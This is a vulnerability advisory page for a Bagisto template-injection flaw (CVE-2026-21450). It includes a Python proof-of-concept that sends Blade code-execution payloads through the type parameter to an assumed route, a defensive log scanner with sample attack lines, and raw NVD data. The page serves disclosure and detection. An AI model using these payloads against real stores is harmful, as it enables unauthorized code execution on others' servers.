Security Vulnerability Report
CVE-2026-21450 CVSS 9.8 CRITICAL

Published: 2026-01-02 21:16:03
Last Modified: 2026-01-08 21:20:39

Description

Bagisto is an open source Laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via the type parameter, which can lead to remote code execution or other exploitation. Version 2.3.10 fixes the issue. In practice this means a user-controlled value reaches Laravel's Blade template engine as template source rather than as data (CWE-1336), so template syntax placed in that value is compiled and executed on the server.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector (v3.1, primary): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Vector (v4.0, secondary): CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X (base score 7.3, HIGH)
Weakness: CWE-1336 (Improper Neutralization of Special Elements Used in a Template Engine)

The two assessments disagree on the one metric that matters most for triage: the primary v3.1 vector scores the flaw as reachable with no privileges (PR:N, 9.8 CRITICAL), while the secondary v4.0 vector requires high privileges (PR:H, 7.3 HIGH) and records exploit maturity as proof-of-concept (E:P). Check whether the vulnerable type parameter is reachable without authentication in your deployment before deciding which figure to act on; the 9.8 is the upper bound.

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* - VULNERABLE
Bagisto < 2.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-21450 PoC - Bagisto SSTI to RCE
# Target: Bagisto versions < 2.3.10

target_url = "http://target.com"  # replace with the Bagisto instance under test

# SSTI payload: Blade's {!! !!} (raw, unescaped echo) compiles to a PHP echo of
# the expression, so a user-controlled string compiled as a Blade template
# executes whatever PHP it contains.
ssti_payload = "{!! phpinfo() !!}"

# Alternative RCE payload (not sent by default; swap it into params to use it)
rce_payload = "{!! system('id') !!}"

# Step 1: endpoint that accepts the vulnerable `type` parameter.
# The advisory text on this page names only the parameter, not the route, so
# /api/products is this PoC's assumption and may need adjusting per deployment.
vulnerable_path = "/api/products"
params = {"type": ssti_payload}

print(f"[*] Sending SSTI payload to {target_url}{vulnerable_path}")
print(f"[*] Payload: {ssti_payload}")

try:
    response = requests.get(
        f"{target_url}{vulnerable_path}",
        params=params,
        timeout=10,
    )
    # phpinfo() output always contains the literal string "PHP Version";
    # matching on that alone avoids false positives from unrelated page text.
    if "PHP Version" in response.text:
        print("[+] Vulnerability confirmed! SSTI successful")
        print("[*] Server executed the injected PHP code")
    else:
        print("[-] No obvious SSTI response detected")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: the vulnerable parameter 'type' is processed by the Blade template
# engine without proper sanitization, allowing PHP code execution.
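The PoC above shows the attacker's side. The block below is an added example written for this page, not code from the Bagisto project or the advisory: it gives the defender's side, scanning Apache/Nginx combined-format access-log lines for Blade template syntax ({!! !!}, {{ }}, @php and similar directives) arriving in query parameters, and undoing several layers of percent-encoding so double-encoded payloads do not slip past. The log lines are constructed for the example, and the /api/products route in them is an assumption (the advisory names only the type parameter). The detector checks every query parameter, not just type, because the same check generalizes to any SSTI sink.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Blade template constructs that would be evaluated if user input were
# compiled as a template: raw echo {!! !!}, escaped echo {{ }}, and
# directives such as @php ... @endphp.
BLADE_PATTERNS = {
    "raw_echo": re.compile(r"\{!!.*?!!\}", re.S),
    "echo": re.compile(r"\{\{.*?\}\}", re.S),
    "directive": re.compile(r"@(?:php|include|extends|eval|inject)\b"),
}

# Apache/Nginx "combined" access-log prefix: client, ident, user, [time],
# "METHOD target PROTOCOL", status. The tail (size, referer, UA) is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value, max_rounds=3):
    """Strip up to max_rounds layers of percent-encoding.

    Attackers double-encode braces (%257B -> %7B -> {) to get past filters
    that decode only once; stop early once another decode changes nothing.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_template_injection(target):
    """Return [(param, decoded_value, pattern_name)] for every query
    parameter in a request target whose decoded value contains Blade syntax."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl removes one encoding layer; fully_decode handles the rest.
    for name, raw_value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw_value)
        for pattern_name, pattern in BLADE_PATTERNS.items():
            if pattern.search(value):
                hits.append((name, value, pattern_name))
                break
    return hits


def scan_access_log(lines):
    """Parse access-log lines and return one alert dict per suspicious request.

    A 200 with template syntax in a parameter is the worst case (the template
    may have rendered); a 4xx/5xx is still an attempt worth triaging.
    """
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line: skip rather than crash
        for param, value, pattern_name in find_template_injection(m["target"]):
            alerts.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": urlsplit(m["target"]).path,
                "param": param,
                "payload": value,
                "pattern": pattern_name,
                "status": int(m["status"]),
            })
    return alerts


# Constructed sample log lines (not real traffic). The request paths are
# illustrative; the advisory names only the `type` parameter, not a route.
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Jan/2026:10:00:01 +0000] "GET /api/products?type=simple&limit=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jan/2026:10:00:05 +0000] "GET /api/products?type=%7B!!%20system(%27id%27)%20!!%7D HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    '198.51.100.7 - - [03/Jan/2026:10:00:09 +0000] "GET /api/products?type=%257B%257B%2520phpinfo()%2520%257D%257D HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    '203.0.113.22 - - [03/Jan/2026:10:01:00 +0000] "GET /search?q=%7Bfoo%7D HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [03/Jan/2026:10:02:30 +0000] "GET /api/products?sort=%40php%20system(%27id%27)%3B%20%40endphp HTTP/1.1" 403 0 "-" "curl/8.4"',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"[{alert['status']}] {alert['ip']} {alert['path']} "
              f"{alert['param']}={alert['payload']!r} ({alert['pattern']})")
```

Access logs record only the request line, so payloads delivered in a POST body will not show up here; pair this with application or WAF logs that capture bodies, and treat any hit against an instance still running a version before 2.3.10 as a probable compromise rather than a blocked attempt.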

References

https://github.com/bagisto/bagisto/security/advisories/GHSA-9hvg-qw5q-wqwp (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21450", "sourceIdentifier": "[email protected]", "published": "2026-01-02T21:16:02.797", "lastModified": "2026-01-08T21:20:38.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue."}, {"lang": "es", "value": "Bagisto es una plataforma de comercio electrónico laravel de código abierto. Las versiones anteriores a la 2.3.10 son vulnerables a la inyección de plantillas del lado del servidor a través del parámetro type, lo que puede conducir a la ejecución remota de código o a otra explotación. La versión 2.3.10 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.10", "matchCriteriaId": "E9A19FD0-5100-48D6-BBB3-5A4CA1D90593"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-9hvg-qw5q-wqwp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}